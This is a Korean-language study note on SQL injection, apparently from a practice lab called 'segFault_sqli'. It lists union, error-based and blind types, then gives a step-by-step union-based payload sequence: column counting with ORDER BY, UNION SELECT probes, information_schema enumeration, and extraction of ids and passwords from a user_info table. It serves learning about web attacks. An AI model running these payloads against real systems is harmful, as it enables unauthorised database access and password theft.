SQL Injection
SQL Injection 데이터 추출 2가지 유형
** SQL 질의문이 화면에 보이는 경우
-> Union SQL Injection
** SQL 에러가 응답에 포함되는 경우
-> Error Based SQL Injection
** SQL 질의문 결과가 화면에 안나오는 경우
-> Blind SQL Injection
select ~ board ~ union select password from member
id : mario%' and '1%'='1
select ~~~~~~~ from ~~~~~~~~ where id like '%%'
출력
-- order by : 정렬
id : mario%' order by 6 #
select (컬럼 6개) from ~~~~~~~~ where id like '%%'
결과가 나올 때 까지 정렬 수를 맞춰나가야함
id : mario%' union select 1,2,3,4,5,6 #
select (컬럼 6개) from ~~~~~~~~ where id like '%%'
-- 시스템 테이블
select database()
mario%' union select database(),2,3,4,5,6 #
select table_name from information_schema.tables WHERE table_schema = 'segFault_sqli'
id : mario%' union select 1,2,3,4,5,6 #
mario%' union select table_name,2,3,4,5,6 from information_schema.tables
WHERE table_schema = 'segFault_sqli' and '1%'='1
table_name 위치에 원하는 값 반환
select (컬럼 6개) from ~~~~~~~~ where id like '%mario%' union select table_name,2,3,4,5,6 from information_information_schema.tables
WHERE table_schema = 'segFault_sqli' and '1%'='1%'
select column_name from information_schema.columns where table_name='user_info'
id : mario%' union select 1,2,3,4,5,6 #
select (컬럼 6개) from ~~~~~~~~ where id like '%%'
mario%' union select column_name,2,3,4,5,6 from information_schema.columns where table_name='user_info'#
table name : user_info
column name : id, name, password ...
select password from user_info
id : mario%' union select id,2,3,password,5,6 from user_info #
select (컬럼 6개) from ~~~~~~~~ where id like '%mario%' union select id,2,3,passowrd,5,6 from user_info
step 6의 데이터를 추출